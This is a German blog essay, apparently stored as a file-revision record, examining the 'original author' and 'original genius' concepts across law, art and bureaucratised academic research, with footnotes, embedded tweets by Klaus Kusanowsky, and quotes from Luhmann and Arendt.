zu lesen ist, von dem Autor selbst. \u00ab\n\n\u2014Luhmann, WdG, 11 fn. 1\n\n____\n\n\nDen konzipierenden, kritzelnden, tippenden, publizierenden menschen als \u203aautor\u2039 des folgetextes zu konzipieren mag sinn machen oder nicht. Zentral ist sie f\u00fcr die rechtliche behandlung von texterzeugnissen (\u00bbgeistigem eigentum\u00ab) zur zu- und absprechung von publikationsrechten und der sicherung der gratifikation bestimmter (nicht-agraischer und nicht-handwerklicher) berufsgruppen. Aber die autoridentifikationstechnik schw\u00e4chelt \u2013 plagiatsj\u00e4ger m\u00f6gen die ideologie des originalautors noch zu retten versuchen, aber die bedrohung der wissenschaftlich-k\u00fcnstlerischen professoralen (alles plagiatore) erzwingt eine diskussion \u00fcber das plagiat, die unterscheidungen wie original\/kopie\/plagiat zwar zu sichern versucht, gerade dieses aber nicht mehr vermag. Das liegt vor allem an neuen schreib- und publikationstechniken, wie sie f\u00fcr konkrete textproduktion unerl\u00e4\u00dflich, oder doch mindestens \u00f6konomisch profitabel geworden sind: Man denke an zitation und verweis in der wissenschaft, mash-up in der kunst \u2013 allgemein: der intertextualit\u00e4t. \n\nDer anri\u00df verdeutlicht: Die kl\u00e4rung kann sich l\u00e4ngst nicht auf einen diskursbereich begrenzt. Gerade die unbedachte vermischung der diskursinteressen und -wertungsmethoden hindert die versachlichung, und es meint die literarische kunst zu verteidigen, wer die gratifikatorischen interessen eines arbeiters sch\u00fctzt. Nicht das letzteres verwerflich w\u00e4re: das behauptet gerade eine ideologie, die dann am originalgenie der kunst festhalten mu\u00df, die gratifikationssicherheit f\u00fcr den arbeiter verdeckt zu besorgen, damit dieser nicht widerspenstig wird. Solcherlei hindert die versachlichung. Das konzept des originalautors ist in keinem bereich zwingend; genauso aber in keinem zwingend ausgeschlossen.\n\nIch skizziere eine kurze genialogie des originalautors durch st\u00fctzung des originalgenies und der einbettung bestimmter berufe in beamtentum und wissenschaft. Gerade so ausf\u00fchrlich, da\u00df wir den autor als rechtskonzept von anderen trennen und gerade diesen ignorieren k\u00f6nnen. 
Uns interessiert dann die verbindung des autorkonzepts in b\u00fcrokratie (der verbeamtete publizist) und der forschung (der originell-innovative autor) in der wissenschaft (das verbeamtete originalgenie) zu untersuchen.\n\nAngemerkt: Da\u00df sich die bereiche trennen lassen und ich fordere, sie sollten f\u00fcr die versachlichung auch getrennt werden, hei\u00dft nicht, sie w\u00e4ren vollkommen l\u00f6sbar. \n\n---\n\nKURZE GENEALOGIE\n\nUm 1800 wird die gratifikatorische absicherung bestimmter berufe notwendig, um ihre ausf\u00fchrung gesellschaftlich festigen zu k\u00f6nnen. Zu diesen geh\u00f6ren schriftsteller und journalisten, philosphen und wissenschaftler. {} Dies hat mehrere gr\u00fcnde: die zunehmende s\u00e4kularisierung und damit die n\u00f6tigung zur staatlichen institutionalisierung von wissenschaft, die \u2026 des m\u00e4zentums und einer damit einhergehenden bedrohung einer beruflichen besch\u00e4ftigung. Nachdem wissenschaft, literatur, jounralismus in produktion und konsumtion wahrscheinlich geworden waren, war der verzicht recht unwahrscheinlich \u2013 viel zu viel hing davon ab.\n\nDort liegt auch der ursprung der originalgeni\u00f6sen ideologie verborgen \u2013 sie erkl\u00e4rte fortschritt subjektbezogen; damit konnte einerseits der erf\u00fcllungsgeschichte der eschatologie eine fortschrittsgeschichte der aufkl\u00e4rung entgegengesetzt, und andererseits die genies als deren verwalter etabliert werden. Im originalgenie finden wir dabei die zentralen aspekte: die unterscheidung original\/kopie, nicht nur mit der aufwertung des ersteren, sondern zugleich mit der implizit unterlegten unterscheidung innovation-originell\/bez\u00fcglich-originell; andererseits der etablierung der engen verbindung des genius mit der sch\u00f6pfung des originals, da\u00df damit das originalgenie als solches etabliert, als andersherum das genie die entstehung von originalen (also die entstehung von innovation) erkl\u00e4rt. Die leistung der unterscheidung darf nicht unterbewertet werden, bedenkt man was zu gew\u00e4hrleisten war: die konzeption von innovation und originalgenie mu\u00dfte recht, wissenschaft (b\u00fcrokratischer forschung) und kunst gen\u00fcgen; sie mu\u00dfte also verschiedene unterscheidungsmittel f\u00fcr verschiedene unterscheidungszwecke zugleich etablieren und gleichzeitig \u00fcbertragbarkeit garantieren. {\u00dcbertragbarkeit meint nicht, da\u00df sich die wissenschaft der rechtsmittel bediente, sondern da\u00df (bspw.) einer unterscheidung im recht eine analoge unterscheidung in der wissenschaft gegen\u00fcbersteht. Analog hei\u00dft, da\u00df der gleiche ereignisbereich abgedeckt und diese ereignisse auf beiden seiten ablehnung oder zustimmung (nicht wissenschaftliche zustimmung und rechtliche ablehnung) erfahren. Der unterscheidung original\/kopie interpretiert sich wissenschaftlich in der unterscheidung innovation\/kopie, rechtlich als besitz\/diebstahl. Diese unterscheidung ist nun aber sehr grob und gen\u00fcgt weder der publizistik noch der forschung. Jede weitere unterscheidung mu\u00df aber \u00fcberall analoge unterscheidungen hervorrufen (oder gewinnt stabilit\u00e4t, wo sie dies tut und wird irritiert, wo dies nicht erf\u00fcllt ist.) So soll wissenschaftlich weder alles irgendwie neue gef\u00f6rdert, noch jeder gebrauch von (fremden) altem abgelehnt werden: es folgen die unterscheidungen innerhalb der unterscheidungsbereiche: 1. 
innovation\/originalit\u00e4t, wobei innovation (neue neuheit: \u00bberfindung\u00ab) gef\u00f6rdert, (nicht-innovative) originalit\u00e4t toleriert wird. Aber auch die kopie wird ein wichtigeres mittel, weshalb dann erlaubte von unerlaubter kopie (zitat\/plagiat) unterschieden wird. (Es ergibt sich der zwischenbereich des reinen zitats: Wer eine arbeit von William James abtippt, sie einreicht, die gesamte arbeit aber als zitat kenntlich macht, f\u00e4llt durch das seminar, ohne wissenschaftlich exkommuniziert zu werden. Der fall erscheint uns so seltsam, weil er ein leerbereich ist, mit dem wir nichts anfangen k\u00f6nnen: er ist weder vollkommen abzulehnen, noch w\u00e4re er irgendwie gefordert. Da\u00df dieses beispiel seltsam wirkt, sollte zur verbl\u00fcffung und faszinatin anregen.) Diese unterscheidungskonkretisierungen m\u00fcssen sich im recht wiederfinden und tut es teils: auch das recht kennt legitimierte\/nicht-legitimierte kopie (unter legitimierte kopie f\u00e4llt dann nicht nur das zitat, sondern auch die von einem durch den autor vertraglich legitimierten verlag kopien). Nur auf zu innovation\/originalit\u00e4t kennt das recht kein analogon. Das ist kein zu erkl\u00e4rendes problem, sondern zeigt den punkt, denn das dieses fehlt ist nicht grundlage f\u00fcr die behauptung der analogen unterscheidung, sondern f\u00fcr die irritation der unterscheidung innovation\/originalit\u00e4t. _jedes_ original verdient rechtlichen schutz. Aber warum ist es n\u00f6tig, eine originelle wiederholung sch\u00fctzen? Ist nicht auch das diebstahl an den innovationen anderer? (Ich darf nicht den text eines anderen als meinen ausgeben, aber wenn ich zwei in meinen worten wiederhole, ist es sch\u00fctzenswert.) Und wenn rechtlich keine mittel gefunden werden innovation von originalit\u00e4t zu unterscheiden, lie\u00dfe sich die r\u00fcckfrage stellen, wie dies in der wissenschaft m\u00f6glich w\u00e4re, und jede antwort darauf w\u00fcrde die frage stellen, warum dies nicht r\u00fcck\u00fcbertragbar w\u00e4re. Die frage, welche art der kopie noch kunst sei und welche nur kopie trifft gerade dieses problem: wie ist nicht-innovative originalit\u00e4t von der kopie zu unterscheiden? Diese instabilit\u00e4t durch fehlende analogizit\u00e4t der unterscheidungen wird auch an anderen stellen deutlich: so kennt die kunst kein analogon zu zitat und kopie, sondern nur h\u00f6chstens direkt kenntliche und unkenntliche kopie. Man mu\u00df nun zugleich von der kunst fordern, das plagiat abzulehnen, ohne ihr das mittel der unkenntlichen kopie zu berauben.) Dies erm\u00f6glicht das originalgenie durch bestimmte offenheit in verbindung mit unbestimmter geschlossenheit {}. Dadurch wird die notwendige r\u00fcckkopplung der verschiedenen diskursbereiche gew\u00e4hrleistet.\n\nDas recht erfordert nicht nur eine unterscheidung von original\/kopie, sondern zugleich eine personenbezogene unterscheidung von originalautor\/kopierer. Eine unterscheidung die f\u00fcr die zunehmende differenzierung und komplexe strukturierung wissenschaftlicher textproduktion allerdings unhaltbar ist, allerdings \u00fcbernommen werden _mu\u00df_, soll die gratifikation einzelner personen gew\u00e4hrleistet werden. (Die gratifikation einzelner menschen ist weder rechtlich noch wissenschaftlich n\u00f6tig; selbst wenn personen h\u00e4ufig menschen entsprechen.) Nicht anders verh\u00e4lt es sich f\u00fcr die publizistik, die f\u00fcr weite verbreitung kopien ben\u00f6tigt. 
dies ist allerdings insofern kein problem, als die kopie nun weiter in legitimierte\/nicht-legitimierte kopie unterscheidbar ist; dies wird in der wissenschaft als zitat\/plagiat ausinterpretiert, in der publizistik als (bezahlte und vertraglich festgelegte) werkpublikation\/(unbezahlte\/unerlaubte) raubkopie. W\u00e4hrend die wissenschaft die eigene reglementierung zitat\/plagiat selbstst\u00e4ndig durchsetzen kann (ich komme darauf zur\u00fcck), ben\u00f6tigt die publizistik den r\u00fcckbezug auf das recht: hier wird zur regelung von vertragsverh\u00e4ltnissen die konzeption des geistigen eigentums etabliert; ein genialer streich {}, der zugleich den bezug originalautor-originalgenie expliziert, w\u00e4hrend er diesen mit den bereits bestehenden mitteln der rechtlichen eigentumsregelung analogisiert. Dadurch m\u00fcssen keine vollst\u00e4ndig neuen rechtstechniken entwickelt, sondern nur alte mittel modifiziert werden.\n\n---\n\nB\u00dcROKRATIE\n\nIch lasse sowohl das recht wie die kunst beiseite (und \u00fcberlasse die besch\u00e4ftigung damit gewitzteren geistern) und besch\u00e4ftige mich mit der wissenschaft. Wie sich angedeutet haben mag, will ich zwischen forschung und wissenschaft unterscheiden, insofern wissenschaft b\u00fcrokratische forschung meint. Letzteres wird dann in form von akademien (instiutionalisierte wissenschaft) und universit\u00e4ten (lehre und forschung verbindende akademien){} Das komplexe auswirkungsverh\u00e4ltnis von forschung-lehre-institution scheint mir selten in angemessener weise behandelt zu werden. (Es wird dann vor allem auf einzelne unterschiede fixiert: lehrfreie forschung\/lehrgebundene forschung, staatliche organistion\/privatorganisation, nicht-akademische forschung\/forschung. Daraus l\u00e4\u00dft sich viel lernen. Es bleiben dann allerdings blinde flecken; die werden dann h\u00e4ufig nicht eingestanden, sondern die erkl\u00e4rungsl\u00fccken auf die einmal getroffene unterscheidung gezwungen.{})\n\nDieser umstand mag daran liegen, da\u00df die forschung l\u00e4ngst totalb\u00fcrokratisiert es, das hei\u00dft, es kaum noch unb\u00fcrokratisches forschen gibt; weder privatgelehrte spielen f\u00fcr die wissenschaft keine bedeutende rolle mehr {}; konzern- und firmengebundene forschung sowie popul\u00e4rwissenschaft haben sich l\u00e4ngst selbst disqualifiziert, indem ihre unabh\u00e4ngigkeitsideologie l\u00e4ngst zerst\u00f6rt wurde. Deshalb wird allenthalben gemeint, forschung sei und sei nur, was an universit\u00e4ten gemacht werde.{} Selten war progression so konservativ.\n\nKonservative progression.\n\nObwohl meist \u00fcbersehen, gibt es progressive konservation: Der bewahrungsvorsatz pa\u00dft sich neuen gegebenheiten an und ist bereit, priorit\u00e4ten offen zu ordnen und problematisieren.{} Ebenso gibt es konservative progression: Ver\u00e4nderungen und neuerungen erhalten etablierte strukturen.{} Dies soll nicht einem \u00bbwirklichen fortschritt\u00ab gegen\u00fcbergestellt werden \u2013 ich vertrete keinen naiven ideologierealismus. Auch konservative progression erm\u00f6glicht fortschritt; und da\u00df sie als mittel gew\u00e4hlt wurde, l\u00e4\u00dft mutma\u00dfen, da\u00df gerade sie (geordnete) progression erm\u00f6glicht hat. {} Indiz ist die zeit des 17. bis ins fr\u00fche 20. jh. Selten h\u00e4tte man die konversion von organisationsstrukturen bei gleichzeitiger ver\u00e4nderlich- und ver\u00e4nderbarkeit derer methoden, techniken und ergebnisse beobachten k\u00f6nnen. 
Hier wird von der flexibilit\u00e4t durch starrheit profitiert.\n\n\nMeine vermutung: dies liegt an der st\u00e4rke b\u00fcrokratischer organisation. Ihre formen sind starr, aber inhaltsleer; wodurch sie sowohl der judenvernichtung, als auch der demokratieerhaltung dienen k\u00f6nnen. Daf\u00fcr ist die entwicklung Deutschlands beispielhaft: Denn an den verfahren zur beurteilung der gegner von nationalsozialisten und den dann folgenden zur rechtssprechung \u00fcber die verbrechen der nationalsozialisten hat sich nichts, aber nat\u00fcrlich auch alles ver\u00e4ndert. Die rechtsverfahren als solche mu\u00dfte nicht abgel\u00f6st, sondern nur modifiziert werden, also bestimmte schritte angepa\u00dft werden. (adresse {})\n\n\n\u2026\n\n{Dies hei\u00dft durchaus nicht, professoren w\u00e4ren zwingend unf\u00e4hig \u2026 Professoren sind ja nicht nur professoren, sondern auch m\u00fctter, k\u00fcnstlerinnen, muslima, w\u00e4hlerin, konsumentin und vielleicht auch etwas verr\u00fcckte blogautorinnen. Das ein professor sich als professor nicht kritisch betrachten kann, hindert ja nicht, da\u00df sie eine skeptische haltung gegen eigenes verhalten in bestimmten rollen einnimmt. Nur wird es mit den jahren handlungs\u2026 immer unwahrscheinlicher, da l\u00e4ngere ein\u00fcbung von erkl\u00e4rungsmuster irritationen gekonnter und \u00bbinnovativer\u00ab disqualifizieren l\u00e4\u00dft. Man kennt das: die wahrscheinlichkeit das ein 5 j\u00e4hriger bezweifelt, da\u00df jungens keine r\u00f6cke tragen sollten ist sehr viel h\u00f6her, als das ein 55 j\u00e4hriger sich dar\u00fcber verbl\u00fcffen l\u00e4\u00dft. Aber das wunder langlebieger wunderei gibt es.\n\n\n\n\n\n\n\n\n\n\n\n\n\n---\n\n \nDa\u00df das problem gerade in der kunst so zentral ist, liegt daran, an verarbeitungstechniken, welche die wissenschaft sich gro\u00dfteilig untersagt, f\u00fcr welche in der kunst ein freiraum geschaffen wurde: Der aneignung und verarbeitung eines themas durch variierte durchf\u00fchrung; die unterscheidung original\/kopie probiert die kunst durch anwendung. (Gerade deshalb gibt es f\u00fcr Kusanowsky auch einen unterschied zwischen dem \u00bbspotler\u00ab und dem \u00bbverbrecher\u00ab. Beide nutzen die kopie f\u00fcr k\u00fcnstlerischen versuche. Jedoch deckt der sportler seine kopie als solche kenntlich macht und zugibt, w\u00e4hrend der verbrecher zugunsten seiner \u00f6konomsichen verwertungsinteressen die kopie nicht als solche zugibt. (Deshalb ist letzteres auch keine k\u00fcnstlerischer verarbeitung der kopie, sondern die kopiertechnik ein mittel wirtschaftlicher profitsteigerung.)\n\n\nhttps:\/\/differentia.wordpress.com\/2016\/08\/10\/kunst-sport-und-verbrechen\/\n\nBeltracchi konnte mit seiner Methode die Struktur der Kunst nicht beeindrucken, Landis dagegen konnte mit der selben Methode f\u00fcr die Beurteilung von Kunst eine Neuerung vorschlagen.\n\n\nDies war nicht immer so und mag sich wieder \u00e4ndern. Vgl. Feyerabend.\n\nAuch maler, zeichner, steinhauer, etc., ja auch komponisten. Ob in den malerischen und musischen produktionsk\u00fcnsten (im gegensatz zu malerischen und musischen exekutionsk\u00fcnsten) die autorkonzeption gleich beschrieben werden kann, wei\u00df ich nicht. Ich vermute ja und nein. Sie lassen sich mit den gleichen strukturen beschreiben, solange vermieden wird zu behaupten, die entwicklungen w\u00e4ren vollst\u00e4ndig analog.\n\n{Was nicht das gleiche ist. 
Bestimmte offenheit meint hier, da\u00df die anschlie\u00dfenden variativen anschl\u00fcsse immer zweckgebunden (n\u00e4mlich der st\u00fctzung ideal originalgenie) dient. Unbestimmte geschlossenheit meint, da\u00df der begriff originalgenie alle variationen verwendungen zwingt eine universale einortbarkeit in allen bereichen (also einschlu\u00df\/ausschlu\u00df) nach muster des originalgenies zu gew\u00e4hrleisten, mit welchen methoden auch immer.}\n\nIch bin in keiner weise sarkastisch: diese einf\u00fchrung diffizieler und komplizierter techniken finde ich faszinierend und bewundernswert. Ablehnungen des autorkonzepts gehen h\u00e4ufig mit plumper ablehnung vergangener leistungen und dem vorwurf einer gewissen \u00bbverwirrung\u00ab und \u00bbirrt\u00fcmlichkeit\u00ab einher. Ein vokabular, das erstaunlich nah an der abgelehnten konzeption orientiert ist. \u2013 Auch die ablehnung einer _aufrechterhaltung_ des originalautorkonzepts erzwingt aber keinen rousseauistischen romantizismus, der zu einer r\u00fcckkehrt zur nat\u00fcrlichen freiheit der kunst (oder was \u00e4hnlichem) aufruft. \u2026\n\nMeine unterscheidung akademie\/universit\u00e4t ist nicht \u00fcberfl\u00fcssig. Die verbindung von wissenschaft und der lehre dieser wissenschaft bedingt und wird bedingt (durch) bestimmte organisationsformen, die sich auf die forschungst\u00e4tigkeit auswirken: universit\u00e4ten bilden ihr eigenes personal aus. Das gilt f\u00fcr akademien nicht zwingend. \n\nEs ist gar nicht unwahrscheinlich, da\u00df ich einfach etwas nicht gelesen habe. Ich lasse mich dann gerne aufkl\u00e4ren und trage das hier nach. (In die kommentare unten oder an http:\/\/twitter.com\/bertrandterrier[@bertrandterrier].)\n\nIch vermute das \u00e4ndert sich. Durch das internet scheint ein neuer forschertyp erm\u00f6glicht zu werden, dem der einstige privatgelehrte am n\u00e4chsten kommt. Ihn zu beschreiben und zu verfassen ben\u00f6tigt es aber wohl neue beobachtungs- und beschreibungsmittel, die nur unwahrscheinlicherweise von der universit\u00e4ren wissenschaft etabliert werden, da dieser typ ihre gratifikationssicherheiten bedroht.\n\nDies f\u00fchrt zu den schmalhirnigsten \u00e4u\u00dferungen, welche einem manches mal zweifeln lassen, ob an universit\u00e4ten nicht prinzipiell die intelligenz fehle, forschung zu machen. So erz\u00e4hlt mir ein freund, auf die frage, wer denn ein philosoph sei, habe ihm ein dozent geantwortet: Der, der einen philosophischen abschlu\u00df hat. Das ist doof und man hofft auf h\u00f6heres denkverm\u00f6gen bei medizinern und pharmazeuten, von denen das eigene leben abh\u00e4ngt.\n\nInteressant dazu der fall in \u2026, wo ein konservativer staat f\u00fcr die aufnahme syrischer fl\u00fcchtlinge stimmt.\n\nSo paradox das klingt, sieht man\u2019s \u00fcberall: Das grundgesetz ist die neuformulierung der biblischen gebote, die aufkl\u00e4rung ist s\u00e4kularisierte theologie, 2016 ist 1933, etc. Dies hei\u00dft nicht, jede erkl\u00e4rung eines (vermeintlich) neuen ph\u00e4nomens durch ein altes sei prinzipiell schlecht und falsch. Es l\u00e4\u00dft sich jedoch eine selbstverpflichtete blindheit gegen neues beobachten. Jedoch l\u00e4\u00dft sich eine tendenz zur ignoranz neuer ph\u00e4nomene beobachten:\n\n++++\n<blockquote class=\"twitter-tweet\" data-lang=\"de\"><p lang=\"de\" dir=\"ltr\">Wenn der Schreiber daf\u00fcr sorgt, dass der Leser nur etwas Bekanntes wiederfindet. 
kann die Beobachtung von Neuem gut behindert werden.<\/p>— Klaus Kusanowsky (@kusanowsky) <a href=\"https:\/\/twitter.com\/kusanowsky\/status\/822378844065644544\">20. Januar 2017<\/a><\/blockquote> <script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n\n<blockquote class=\"twitter-tweet\" data-lang=\"de\"><p lang=\"de\" dir=\"ltr\">Die Verhinderung von Neuem gelingt, indem man f\u00fcr den Fortbestand von Nichtsneuem sorgt.<\/p>— Klaus Kusanowsky (@kusanowsky) <a href=\"https:\/\/twitter.com\/kusanowsky\/status\/822377924409987073\">20. Januar 2017<\/a><\/blockquote> <script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n++++\n\nDies liegt nicht an der ignoranz einer gro\u00dfe masse von wissenschaftlern; sondern an der festgelegtheit von beobachtungstechnik, welche die eigenen probleme grunds\u00e4tzlich blindsetzt. Es ben\u00f6tigt ja kein kurzes training, um sich die blindsetzung bestimmter probleme und die adelung anderer anzutrainieren (das hat sich bereits auf ca. 30 jahre (grundschule, schule, studium, promotion, habilitation) gesteigert.\n\nIch meine \u00bbfortschritt\u00ab nicht ideologisch, weshalb ich lieber von progression spreche; was nichts anderes hei\u00dft und nur einer verwirrung dient, der autor mache hier wohl auf eine verschobene implikation aufmerksam. Progression ist nicht gut oder schlecht, aber sie ist auch kein rein zeitlicher wechsel von annahmen. Sie meint, sp\u00e4teres bez\u00f6ge sich auf fr\u00fcheres; das g\u00e4lte aber auch f\u00fcr eine kultur, die pl\u00f6tzlich gro\u00dfen technologieverzicht leistet \u2013 insofern dies ja ein weiterschreiten und eben kein zur\u00fcckschreiten ist. (Vergessen ist ein schweres unterfangen: ich schreibe dar\u00fcber hier.)\n\nDer wichtigkeit der subjektentlastung durch adressierbarkeit hat meines wissens nach @ReisAgainst innoviert. Zu einem recht lahmen vortrag zur geschichte des kapitalismus in einem marxistisch-kommunistischen kontext wurden da \u00bbausnutzen\u00ab und \u00bbabh\u00e4ngigkeit\u00ab des arbeiters durch und von den kapitalistischen betriebsbesitzern der \u00bbselbstst\u00e4ndigkeit\u00ab des bauern mit eigenem grundst\u00fcck gegen\u00fcbergestellt. @ReisAgainst machte den (sehr intelligenten) punkt, da\u00df nur der arbeiter \u00fcber eine adresse f\u00fcr beschwerde und forderung habe, w\u00e4hrend dem bauer bei d\u00fcrre ein streik nichts helfe. Zu der bedeutung von adressierbarkeit hoffe ich auf einen text von ihm; da scheint mir fiel interessantes dran zu sein. Es lie\u00dfe sich dann auch fragen, ob nicht die adressierbarkeit von allem an jeden ein problem der modernen b\u00fcrokratie ist. Denn die totalit\u00e4t der adressierbarkeit f\u00fchrt doch gerade dazu, da\u00df jeder angesprochene schlicht auf andere adressen verweis, bis man aufgibt oder mit dem verweis auf die b\u00fcrokratischen verfahren selbst abserviert wird. Vgl. hierzu auch Arendt [MuG: 80]:\n\n____\nB\u00fcroktatie ist diejenige Staatsform, in welcher es niemanden mehr gibt, der Macht aus\u00fcbt; und wo alle gleicherma\u00dfen ohnm\u00e4chtig sind, haben wir eine Tyrannis ohne Tyrannen. 
\n____\n\n---\n\nLITERATUR\n\nLuhmann, Niklas: Wissenschaft der Gesellschaft (stw 1001), Frankfurt\/M, ^7^2015 [1990]","old_contents":"# DER TEXT ALS AUTOR\n:hp-tags: autor, forschung, originalgenie, text, wissenschaft\n:published_at: 2017-01-23\n\nWEITERER TEXT \u00dcBER DAS ORIGINALGENIE\n\n____\n\n\u00bbMittelalterliche Textgepflogenheiten, die das Buch selbst wie einen Autor sprechen lassen, haben den Buchdruck nicht \u00fcberlebt. Es w\u00e4re nicht ganz abwegig, sie wiederaufzugreifen, denn schlie\u00dflich stammt, jedenfalls wo es \u203awissenschaftlich\u2039 zugeht, nur sehr weniges, was in einem Buch zu lesen ist, von dem Autor selbst. \u00ab\n\n\u2014Luhmann, WdG, 11 fn. 1\n\n____\n\n\nDen konzipierenden, kritzelnden, tippenden, publizierenden menschen als \u203aautor\u2039 des folgetextes zu konzipieren mag sinn machen oder nicht. Zentral ist sie f\u00fcr die rechtliche behandlung von texterzeugnissen (\u00bbgeistigem eigentum\u00ab) zur zu- und absprechung von publikationsrechten und der sicherung der gratifikation bestimmter (nicht-agraischer und nicht-handwerklicher) berufsgruppen. Aber die autoridentifikationstechnik schw\u00e4chelt \u2013 plagiatsj\u00e4ger m\u00f6gen die ideologie des originalautors noch zu retten versuchen, aber die bedrohung der wissenschaftlich-k\u00fcnstlerischen professoralen (alles plagiatore) erzwingt eine diskussion \u00fcber das plagiat, die unterscheidungen wie original\/kopie\/plagiat zwar zu sichern versucht, gerade dieses aber nicht mehr vermag. Das liegt vor allem an neuen schreib- und publikationstechniken, wie sie f\u00fcr konkrete textproduktion unerl\u00e4\u00dflich, oder doch mindestens \u00f6konomisch profitabel geworden sind: Man denke an zitation und verweis in der wissenschaft, mash-up in der kunst \u2013 allgemein: der intertextualit\u00e4t. \n\nDer anri\u00df verdeutlicht: Die kl\u00e4rung kann sich l\u00e4ngst nicht auf einen diskursbereich begrenzt. Gerade die unbedachte vermischung der diskursinteressen und -wertungsmethoden hindert die versachlichung, und es meint die literarische kunst zu verteidigen, wer die gratifikatorischen interessen eines arbeiters sch\u00fctzt. Nicht das letzteres verwerflich w\u00e4re: das behauptet gerade eine ideologie, die dann am originalgenie der kunst festhalten mu\u00df, die gratifikationssicherheit f\u00fcr den arbeiter verdeckt zu besorgen, damit dieser nicht widerspenstig wird. Solcherlei hindert die versachlichung. Das konzept des originalautors ist in keinem bereich zwingend; genauso aber in keinem zwingend ausgeschlossen.\n\nIch skizziere eine kurze genialogie des originalautors durch st\u00fctzung des originalgenies und der einbettung bestimmter berufe in beamtentum und wissenschaft. Gerade so ausf\u00fchrlich, da\u00df wir den autor als rechtskonzept von anderen trennen und gerade diesen ignorieren k\u00f6nnen. Uns interessiert dann die verbindung des autorkonzepts in b\u00fcrokratie (der verbeamtete publizist) und der forschung (der originell-innovative autor) in der wissenschaft (das verbeamtete originalgenie) zu untersuchen.\n\nAngemerkt: Da\u00df sich die bereiche trennen lassen und ich fordere, sie sollten f\u00fcr die versachlichung auch getrennt werden, hei\u00dft nicht, sie w\u00e4ren vollkommen l\u00f6sbar. \n\n---\n\nKURZE GENEALOGIE\n\nUm 1800 wird die gratifikatorische absicherung bestimmter berufe notwendig, um ihre ausf\u00fchrung gesellschaftlich festigen zu k\u00f6nnen. Zu diesen geh\u00f6ren schriftsteller und journalisten, philosphen und wissenschaftler. 
{} Dies hat mehrere gr\u00fcnde: die zunehmende s\u00e4kularisierung und damit die n\u00f6tigung zur staatlichen institutionalisierung von wissenschaft, die \u2026 des m\u00e4zentums und einer damit einhergehenden bedrohung einer beruflichen besch\u00e4ftigung. Nachdem wissenschaft, literatur, jounralismus in produktion und konsumtion wahrscheinlich geworden waren, war der verzicht recht unwahrscheinlich \u2013 viel zu viel hing davon ab.\n\nDort liegt auch der ursprung der originalgeni\u00f6sen ideologie verborgen \u2013 sie erkl\u00e4rte fortschritt subjektbezogen; damit konnte einerseits der erf\u00fcllungsgeschichte der eschatologie eine fortschrittsgeschichte der aufkl\u00e4rung entgegengesetzt, und andererseits die genies als deren verwalter etabliert werden. Im originalgenie finden wir dabei die zentralen aspekte: die unterscheidung original\/kopie, nicht nur mit der aufwertung des ersteren, sondern zugleich mit der implizit unterlegten unterscheidung innovation-originell\/bez\u00fcglich-originell; andererseits der etablierung der engen verbindung des genius mit der sch\u00f6pfung des originals, da\u00df damit das originalgenie als solches etabliert, als andersherum das genie die entstehung von originalen (also die entstehung von innovation) erkl\u00e4rt. Die leistung der unterscheidung darf nicht unterbewertet werden, bedenkt man was zu gew\u00e4hrleisten war: die konzeption von innovation und originalgenie mu\u00dfte recht, wissenschaft (b\u00fcrokratischer forschung) und kunst gen\u00fcgen; sie mu\u00dfte also verschiedene unterscheidungsmittel f\u00fcr verschiedene unterscheidungszwecke zugleich etablieren und gleichzeitig \u00fcbertragbarkeit garantieren. {\u00dcbertragbarkeit meint nicht, da\u00df sich die wissenschaft der rechtsmittel bediente, sondern da\u00df (bspw.) einer unterscheidung im recht eine analoge unterscheidung in der wissenschaft gegen\u00fcbersteht. Analog hei\u00dft, da\u00df der gleiche ereignisbereich abgedeckt und diese ereignisse auf beiden seiten ablehnung oder zustimmung (nicht wissenschaftliche zustimmung und rechtliche ablehnung) erfahren. Der unterscheidung original\/kopie interpretiert sich wissenschaftlich in der unterscheidung innovation\/kopie, rechtlich als besitz\/diebstahl. Diese unterscheidung ist nun aber sehr grob und gen\u00fcgt weder der publizistik noch der forschung. Jede weitere unterscheidung mu\u00df aber \u00fcberall analoge unterscheidungen hervorrufen (oder gewinnt stabilit\u00e4t, wo sie dies tut und wird irritiert, wo dies nicht erf\u00fcllt ist.) So soll wissenschaftlich weder alles irgendwie neue gef\u00f6rdert, noch jeder gebrauch von (fremden) altem abgelehnt werden: es folgen die unterscheidungen innerhalb der unterscheidungsbereiche: 1. innovation\/originalit\u00e4t, wobei innovation (neue neuheit: \u00bberfindung\u00ab) gef\u00f6rdert, (nicht-innovative) originalit\u00e4t toleriert wird. Aber auch die kopie wird ein wichtigeres mittel, weshalb dann erlaubte von unerlaubter kopie (zitat\/plagiat) unterschieden wird. (Es ergibt sich der zwischenbereich des reinen zitats: Wer eine arbeit von William James abtippt, sie einreicht, die gesamte arbeit aber als zitat kenntlich macht, f\u00e4llt durch das seminar, ohne wissenschaftlich exkommuniziert zu werden. Der fall erscheint uns so seltsam, weil er ein leerbereich ist, mit dem wir nichts anfangen k\u00f6nnen: er ist weder vollkommen abzulehnen, noch w\u00e4re er irgendwie gefordert. Da\u00df dieses beispiel seltsam wirkt, sollte zur verbl\u00fcffung und faszinatin anregen.) 
Diese unterscheidungskonkretisierungen m\u00fcssen sich im recht wiederfinden und tut es teils: auch das recht kennt legitimierte\/nicht-legitimierte kopie (unter legitimierte kopie f\u00e4llt dann nicht nur das zitat, sondern auch die von einem durch den autor vertraglich legitimierten verlag kopien). Nur auf zu innovation\/originalit\u00e4t kennt das recht kein analogon. Das ist kein zu erkl\u00e4rendes problem, sondern zeigt den punkt, denn das dieses fehlt ist nicht grundlage f\u00fcr die behauptung der analogen unterscheidung, sondern f\u00fcr die irritation der unterscheidung innovation\/originalit\u00e4t. _jedes_ original verdient rechtlichen schutz. Aber warum ist es n\u00f6tig, eine originelle wiederholung sch\u00fctzen? Ist nicht auch das diebstahl an den innovationen anderer? (Ich darf nicht den text eines anderen als meinen ausgeben, aber wenn ich zwei in meinen worten wiederhole, ist es sch\u00fctzenswert.) Und wenn rechtlich keine mittel gefunden werden innovation von originalit\u00e4t zu unterscheiden, lie\u00dfe sich die r\u00fcckfrage stellen, wie dies in der wissenschaft m\u00f6glich w\u00e4re, und jede antwort darauf w\u00fcrde die frage stellen, warum dies nicht r\u00fcck\u00fcbertragbar w\u00e4re. Die frage, welche art der kopie noch kunst sei und welche nur kopie trifft gerade dieses problem: wie ist nicht-innovative originalit\u00e4t von der kopie zu unterscheiden? Diese instabilit\u00e4t durch fehlende analogizit\u00e4t der unterscheidungen wird auch an anderen stellen deutlich: so kennt die kunst kein analogon zu zitat und kopie, sondern nur h\u00f6chstens direkt kenntliche 